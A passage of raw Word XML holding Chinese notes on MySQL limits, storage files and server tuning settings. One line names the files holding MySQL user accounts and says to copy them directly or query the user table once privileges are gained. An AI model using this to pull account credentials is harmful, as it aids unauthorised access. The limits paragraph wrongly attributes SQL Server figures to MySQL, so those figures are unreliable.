      </w:r>
      <w:r>
        <w:tab/>
        <w:t>insert into instructor(id, name, dept_name, salary)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  values (new.id, new.name, new.dept_name, new.salary);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>中，每个数据库最多可创建</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>亿个表，一个表允许定义</w:t>
      </w:r>
      <w:r>
        <w:t>1024</w:t>
      </w:r>
      <w:r>
        <w:t>列，每行的最大长度为</w:t>
      </w:r>
      <w:r>
        <w:t>8092</w:t>
      </w:r>
      <w:r>
        <w:t>字节（不包括文本和图像类型的长度）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>当表中定义有</w:t>
      </w:r>
      <w:r>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>nvarchar</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>varbinary</w:t>
      </w:r>
      <w:r>
        <w:t>类型列时，如果向表中插入的数据行超过</w:t>
      </w:r>
      <w:r>
        <w:t>8092</w:t>
      </w:r>
      <w:r>
        <w:t>字节时将导致</w:t>
      </w:r>
      <w:r>
        <w:t>Transact-SQL</w:t>
      </w:r>
      <w:r>
        <w:t>语句（</w:t>
      </w:r>
      <w:r>
        <w:t>SQL Server</w:t>
      </w:r>
      <w:r>
        <w:t>的编程语言，是结构化查询语言（</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>）的增强版本）失败，并产生错误信息。</w:t>
      </w:r>
      <w:r>
        <w:t>SQL Server</w:t>
      </w:r>
      <w:r>
        <w:t>对每个表中行的数量没有直接限制，但它受数据库存储空间的限制。每个数据库的最大空间</w:t>
      </w:r>
      <w:r>
        <w:t>1048516TB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:t>亿的表按</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> id </w:t>
      </w:r>
      <w:r>
        <w:t>取都能在毫秒级返回（肯定要建立主键），十万</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mysql </w:t>
      </w:r>
      <w:r>
        <w:t>应该毫无压力。反正每个表百万级还是可以的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r>
        <w:t>数据库文件有</w:t>
      </w:r>
      <w:r>
        <w:t>frm</w:t>
      </w:r>
      <w:r>
        <w:t>（描述表的结构）、</w:t>
      </w:r>
      <w:r>
        <w:t>MYD</w:t>
      </w:r>
      <w:r>
        <w:t>（数据文件）、</w:t>
      </w:r>
      <w:r>
        <w:t>MYI</w:t>
      </w:r>
      <w:r>
        <w:t>（索引）那么与用户有关的也就是</w:t>
      </w:r>
      <w:r>
        <w:t>user.frm</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>user.MYD</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>user.MYI</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>自己直接取文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2.</w:t>
      </w:r>
      <w:r>
        <w:t>得到足够的权限以后</w:t>
      </w:r>
      <w:r>
        <w:t>select * from user</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>配置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> InnoDB </w:t>
      </w:r>
      <w:r>
        <w:t>的每张表一个数据文件设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">InnoDB </w:t>
      </w:r>
      <w:r>
        <w:t>是一个存储引擎。以前，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>使用系统表空间来保存数据库中的表和索引。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">InnoDB </w:t>
      </w:r>
      <w:r>
        <w:t>提供了更灵活的方式，它把每个数据库的信息保存在一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .ibd </w:t>
      </w:r>
      <w:r>
        <w:t>数据文件中。每个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .idb </w:t>
      </w:r>
      <w:r>
        <w:t>文件代表它自己的表空间。通过这样的方式可以更快地完成类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “TRUNCATE” </w:t>
      </w:r>
      <w:r>
        <w:t>的数据库操作，当删除或截断一个数据库表时，你也可以回收未使用的空间。这样配置的另一个好处是你可以将某些数据库表放在一个单独的存储设备。这可以大大提升你磁盘的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:t>负载。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /etc/my.cnf </w:t>
      </w:r>
      <w:r>
        <w:t>文件中看到。该指令看起来是这样的：</w:t>
      </w:r>
      <w:r>
        <w:t>innodb_file_per_table=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>开启了每表一个文件的参数，只是将</w:t>
      </w:r>
      <w:r>
        <w:t>ibdata1</w:t>
      </w:r>
      <w:r>
        <w:t>空间属于自己的表的索引和数据移到独立的</w:t>
      </w:r>
      <w:r>
        <w:t>.ibd</w:t>
      </w:r>
      <w:r>
        <w:t>文件去而已，其他的比如说</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">undo </w:t>
      </w:r>
      <w:r>
        <w:t>日志</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>插入缓冲</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>双写缓存等等依然在</w:t>
      </w:r>
      <w:r>
        <w:t>ibdata1</w:t>
      </w:r>
      <w:r>
        <w:t>里面。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>show variables like '%_per_%';</w:t>
      </w:r>
      <w:r>
        <w:t>查看开启情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>我使用改文件的方法开启失败，还是使用</w:t>
      </w:r>
      <w:r>
        <w:t>set global innodb_file_per_table=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>优化使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> InnoDB </w:t>
      </w:r>
      <w:r>
        <w:t>的缓冲池</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>在一个专用的机器上，你可能会把</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 60-70</w:t>
      </w:r>
      <w:r>
        <w:t>％</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>的内存分配给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> innodb_buffer_pool_size </w:t>
      </w:r>
      <w:r>
        <w:t>。如果你打算在一个机器上运行更多的服务，你应该重新考虑专门用于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> innodb_buffer_pool_size </w:t>
      </w:r>
      <w:r>
        <w:t>的内存大小。你需要设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> my.cnf </w:t>
      </w:r>
      <w:r>
        <w:t>中的此项</w:t>
      </w:r>
      <w:r>
        <w:t>:innodb_buffer_pool_size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>避免使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Swappiness</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>交换</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是一个当系统移动部分内存到一个称为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r>
        <w:t>交换空间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:t>的特殊磁盘空间时的过程。通常当你的系统用完物理内存后就会出现这种情况，系统将信息写入磁盘而不是释放一些内存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>该选项默认情况下是启用的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"># sysctl vm.swappiness </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>vm.swappiness = 60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>运行以下命令关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> swappiness</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t># sysctl -w vm.swappiness=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>的最大连接数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">max_connections </w:t>
      </w:r>
      <w:r>
        <w:t>指令告诉你当前你的服务器允许多少并发连接。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MySQL/MariaDB </w:t>
      </w:r>
      <w:r>
        <w:t>服务器允许有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUPER </w:t>
      </w:r>
      <w:r>
        <w:t>权限的用户在最大连接之外再建立一个连接。只有当执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>请求的时候才会建立连接，执行完成后会关闭连接并被新的连接取代。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>请记住，太多的连接会导致内存的使用量过高并且会锁住你的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>服务器。一般小网站需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 100-200 </w:t>
      </w:r>
      <w:r>
        <w:t>的连接数，而较大可能需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 500-800 </w:t>
      </w:r>
      <w:r>
        <w:t>甚至更多。这里的值很大程度上取决于你</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL/MariaDB </w:t>
      </w:r>
      <w:r>
        <w:t>的使用情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>你可以动态地改变</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> max_connections </w:t>
      </w:r>
      <w:r>
        <w:t>的值而无需重启</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>服务器：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t># mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>mysql&gt; set global max_connections = 300;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>的线程缓存数量（也就是线程池）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>要提高服务器的性能，你可以设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thread_cache_size </w:t>
      </w:r>
      <w:r>
        <w:t>的值相对高一些。你可以通过以下方法来查看线程缓存命中率：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>mysql&gt; show status like 'Threads_created';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>mysql&gt; show status like 'Connections';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>你可以用以下公式来计算线程池的命中率：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>100 - ((Threads_created / Connections) * 100)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>如果你得到一个较低的数字，这意味着大多数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mysql </w:t>
      </w:r>
      <w:r>
        <w:t>连接使用新的线程，而不是从缓存加载。在这种情况下，你需要增加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thread_cache_size </w:t>
      </w:r>
      <w:r>
        <w:t>。这里有一个好处是可以动态地改变</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thread_cache_size </w:t>
      </w:r>
      <w:r>
        <w:t>而无需重启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>服务。你可以通过以下方式来实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>mysql&gt; set global thread_cache_size = 16;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:t>禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>对用户的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>默认情况下当新的连接出现时，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MySQL/MariaDB </w:t>
      </w:r>
      <w:r>
        <w:t>会进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:t>查询解析用户的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>主机名。对于每个客户端连接，它的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:t>都会被解析为主机名。然后，主机名又被反解析为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:t>来验证两者是否一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:t>配置错误或服务器出现问题时，这很可能会导致延迟。这就是为什么要关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:t>的反向查询的原因，你可以在你的配置文件中添加以下选项去设定：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>[mysqld]  vim /etc/my.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t># Skip reverse DNS lookup of clients</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>skip-name-resolve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>更改后你需要重启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>服务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>的查询缓存容量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>如果你有很多重复的查询并且数据不经常改变</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>请使用缓存查询。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>人们常常不理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> query_cache_size </w:t>
      </w:r>
      <w:r>
        <w:t>的实际含义而将此值设置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GB </w:t>
      </w:r>
      <w:r>
        <w:t>级，这实际上会降低服务器的性能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>背后的原因是，在更新过程中线程需要锁定缓存。通常设置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 200-300 MB</w:t>
      </w:r>
      <w:r>
        <w:t>应该足够了。如果你的网站比较小的，你可以尝试给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 64M </w:t>
      </w:r>
      <w:r>
        <w:t>并在以后及时去增加。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>在你的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>配置文件中添加以下设置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>query_cache_type = 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>query_cache_limit = 256K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>query_cache_min_res_unit = 2k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>query_cache_size = 80M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>8.</w:t>
      </w:r>
      <w:r>
        <w:t>配置临时表容量和内存表最大容量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">tmp_table_size </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> max_heap_table_size </w:t>
      </w:r>
      <w:r>
        <w:t>这两个变量的大小应该相同，它们可以让你避免磁盘写入。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tmp_table_size </w:t>
      </w:r>
      <w:r>
        <w:t>是内置内存表的最大空间。如果表的大小超出限值将会被转换为磁盘上的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MyISAM </w:t>
      </w:r>
      <w:r>
        <w:t>表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>这会影响数据库的性能。管理员通常建议在服务器上设置这两个值为每</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GB </w:t>
      </w:r>
      <w:r>
        <w:t>内存给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 64M</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>[mysqld]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>tmp_table_size= 64M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>max_heap_table_size= 64M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>9.</w:t>
      </w:r>
      <w:r>
        <w:t>启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>慢查询日志</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>记录慢查询可以帮助你定位数据库中的问题并帮助你调试。这可以通过在你的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>配置文件中添加以下值来启用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>slow-query-log = 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>slow-query-log-file = /var/lib/mysql/mysql-slow.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>long_query_time = 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>第一个变量启用慢查询日志，第二个告诉</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>实际的日志文件存储位置。使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> long_query_time </w:t>
      </w:r>
      <w:r>
        <w:t>来定义完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>查询多少用时算长。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>10.</w:t>
      </w:r>
      <w:r>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>的空闲连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>空闲连接会消耗资源，可以的话应该被终止或者刷新。空闲连接是指处于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “sleep” </w:t>
      </w:r>
      <w:r>
        <w:t>状态并且保持了很长一段时间的连接。你可以通过运行以下命令查看空闲连接：</w:t>
      </w:r>
      <w:r>
        <w:t># mysqladmin processlist -u root -p | grep “Sleep”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>首先你要做的就是检查代码问题并修复它。如果你不能访问正在运行的代码，你可以修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wait_timeout </w:t>
      </w:r>
      <w:r>
        <w:t>变量。默认值是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 28800 </w:t>
      </w:r>
      <w:r>
        <w:t>秒，而你可以安全地将其降低到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 60 </w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>wait_timeout=60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>11.</w:t>
      </w:r>
      <w:r>
        <w:t>文件系统的选取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>按照</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MariaDB </w:t>
      </w:r>
      <w:r>
        <w:t>的建议，最好的文件系统是</w:t>
      </w:r>
      <w:r>
        <w:t>XFS</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ext4 </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Btrfs</w:t>
      </w:r>
      <w:r>
        <w:t>。它们都是可以使用超大文件和大容量存储卷的企业级日志型文件系统。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>下面你可以找到一些关于这三个文件系统的有用信息：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
